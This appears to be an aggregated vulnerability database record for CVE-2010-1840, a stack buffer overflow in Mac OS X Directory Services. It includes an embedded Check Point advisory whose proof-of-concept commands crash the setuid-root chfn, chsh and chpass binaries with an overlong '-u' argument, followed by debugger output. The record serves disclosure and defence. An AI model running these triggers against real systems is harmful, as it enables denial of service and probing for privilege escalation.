ID

VAR-201011-0215


CVE

CVE-2010-1840


TITLE

Apple Mac OS X of password-validation Stack-based buffer overflow vulnerability in functionality

Trust: 0.8

sources: JVNDB: JVNDB-2010-002418

DESCRIPTION

Stack-based buffer overflow in the password-validation functionality in Directory Services in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors. Local attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4, and Mac OS X Server 10.6 to 10.6.4. NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Apple Directory Services Memory Corruption CVE-2010-1840 INTRODUCTION chfn, chpass and chsh dos not properly parse authname switch ("-u"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default. This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected: Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh CVSS Scoring System The CVSS score is: 3.3 Base Score: 4.2 Temporal Score: 3.3 We used the following values to calculate the scores: Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C Temporal score is: E:POC/RL:OF/RC:C TRIGGERING THE PROBLEM /usr/bin/chfn -u `perl -e 'print "A" x 3000'` /usr/bin/chsh -u `perl -e 'print "A" x 3000'` /usr/bin/chpass -u `perl -e 'print "A" x 3000'` DETAILS Disassembly: 0x92237215 <CFArrayGetValueAtIndex+101>: mov $0x28,%al 0x92237217 <CFArrayGetValueAtIndex+103>: cmp $0xc,%ecx 0x9223721a <CFArrayGetValueAtIndex+106>: mov $0x14,%dl 0x9223721c <CFArrayGetValueAtIndex+108>: cmovne %edx,%eax 0x9223721f <CFArrayGetValueAtIndex+111>: add %esi,%eax 0x92237221 <CFArrayGetValueAtIndex+113>: mov 0xc(%ebp),%edx 0x92237224 <CFArrayGetValueAtIndex+116>: lea (%eax,%edx,4),%eax 0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax <----- Crash here. (gdb) x/i $pc 0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax (gdb) i r $eax eax 0x585d910 92657936 (gdb) bt #0 0x92237227 in CFArrayGetValueAtIndex () #1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory () #2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory () #3 0x9224b7b0 in _CFBundleGetLanguageSearchList () #4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory () #5 0x9224b7b0 in _CFBundleGetLanguageSearchList () #6 0x9225b50c in CFBundleCopyResourceURL () #7 0x9225bb32 in CFBundleCopyLocalizedString () #8 0x903633eb in _ODNodeSetCredentials () #9 0x90369813 in ODRecordSetNodeCredentials () #10 0x000044be in ?? () #11 0x000026ac in ?? () #12 0x000022ee in ?? () The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability. CREDITS This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). ACKNOWLEDGES Many thanks to Rafael Silva who brought the issue in chfn binary to our attention. -- Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense

Trust: 2.07

sources: NVD: CVE-2010-1840 // JVNDB: JVNDB-2010-002418 // BID: 44816 // VULHUB: VHN-44445 // PACKETSTORM: 95771

AFFECTED PRODUCTS

vendor:applemodel:mac os xscope:eqversion:10.6.2

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.6.4

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.6.2

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.6.1

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.5.8

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.6.3

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.6.4

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.6.1

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.5.8

Trust: 1.6

vendor:applemodel:mac os x serverscope:eqversion:10.6.0

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.6.3

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.0

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:v10.5.8

Trust: 0.8

vendor:applemodel:mac os xscope:eqversion:v10.6 to v10.6.4

Trust: 0.8

vendor:applemodel:mac os x serverscope:eqversion:v10.5.8

Trust: 0.8

vendor:applemodel:mac os x serverscope:eqversion:v10.6 to v10.6.4

Trust: 0.8

vendor:applemodel:mac os serverscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.3

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.5.8

Trust: 0.3

vendor:applemodel:mac os serverscope:eqversion:x10.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.8

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6

Trust: 0.3

vendor:applemodel:mac os serverscope:neversion:x10.6.5

Trust: 0.3

sources: BID: 44816 // JVNDB: JVNDB-2010-002418 // CNNVD: CNNVD-201011-148 // NVD: CVE-2010-1840

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2010-1840
value: HIGH

Trust: 1.0

NVD: CVE-2010-1840
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201011-148
value: HIGH

Trust: 0.6

VULHUB: VHN-44445
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2010-1840
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-44445
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-44445 // JVNDB: JVNDB-2010-002418 // CNNVD: CNNVD-201011-148 // NVD: CVE-2010-1840

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.9

sources: VULHUB: VHN-44445 // JVNDB: JVNDB-2010-002418 // NVD: CVE-2010-1840

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201011-148

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201011-148

CONFIGURATIONS

sources: JVNDB: JVNDB-2010-002418

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-44445

PATCH

title:HT4435url:http://support.apple.com/kb/HT4435

Trust: 0.8

title:HT4435url:http://support.apple.com/kb/HT4435?viewlocale=ja_JP

Trust: 0.8

sources: JVNDB: JVNDB-2010-002418

EXTERNAL IDS

db:NVDid:CVE-2010-1840

Trust: 2.9

db:SECTRACKid:1024723

Trust: 1.1

db:JVNDBid:JVNDB-2010-002418

Trust: 0.8

db:CNNVDid:CNNVD-201011-148

Trust: 0.7

db:APPLEid:APPLE-SA-2010-11-10-1

Trust: 0.6

db:BIDid:44816

Trust: 0.4

db:PACKETSTORMid:95771

Trust: 0.2

db:SEEBUGid:SSVID-70191

Trust: 0.1

db:EXPLOIT-DBid:15491

Trust: 0.1

db:VULHUBid:VHN-44445

Trust: 0.1

sources: VULHUB: VHN-44445 // BID: 44816 // JVNDB: JVNDB-2010-002418 // PACKETSTORM: 95771 // CNNVD: CNNVD-201011-148 // NVD: CVE-2010-1840

REFERENCES

url:http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html

Trust: 1.7

url:http://support.apple.com/kb/ht4435

Trust: 1.7

url:http://www.securitytracker.com/id?1024723

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1840

Trust: 0.8

url:http://jvn.jp/cert/jvnvu331391

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-1840

Trust: 0.8

url:http://www.apple.com/macosx/

Trust: 0.3

url:/archive/1/514724

Trust: 0.3

url:http://www.securityfocus.com/advisories/20899

Trust: 0.3

url:http://www.checkpoint.com/defense/

Trust: 0.1

url:http://www.checkpoint.com/defense

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2010-1840

Trust: 0.1

sources: VULHUB: VHN-44445 // BID: 44816 // JVNDB: JVNDB-2010-002418 // PACKETSTORM: 95771 // CNNVD: CNNVD-201011-148 // NVD: CVE-2010-1840

CREDITS

Rodrigo Rubira Branco of Check Point Vulnerability Discovery Team (VDT), and Rainer Mueller.

Trust: 0.3

sources: BID: 44816

SOURCES

db:VULHUBid:VHN-44445
db:BIDid:44816
db:JVNDBid:JVNDB-2010-002418
db:PACKETSTORMid:95771
db:CNNVDid:CNNVD-201011-148
db:NVDid:CVE-2010-1840

LAST UPDATE DATE

2025-04-11T22:36:09.744000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-44445date:2010-12-10T00:00:00
db:BIDid:44816date:2010-11-12T16:57:00
db:JVNDBid:JVNDB-2010-002418date:2010-11-29T00:00:00
db:CNNVDid:CNNVD-201011-148date:2011-01-10T00:00:00
db:NVDid:CVE-2010-1840date:2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:VULHUBid:VHN-44445date:2010-11-15T00:00:00
db:BIDid:44816date:2010-11-10T00:00:00
db:JVNDBid:JVNDB-2010-002418date:2010-11-29T00:00:00
db:PACKETSTORMid:95771date:2010-11-11T18:02:00
db:CNNVDid:CNNVD-201011-148date:2010-11-17T00:00:00
db:NVDid:CVE-2010-1840date:2010-11-15T23:00:04.533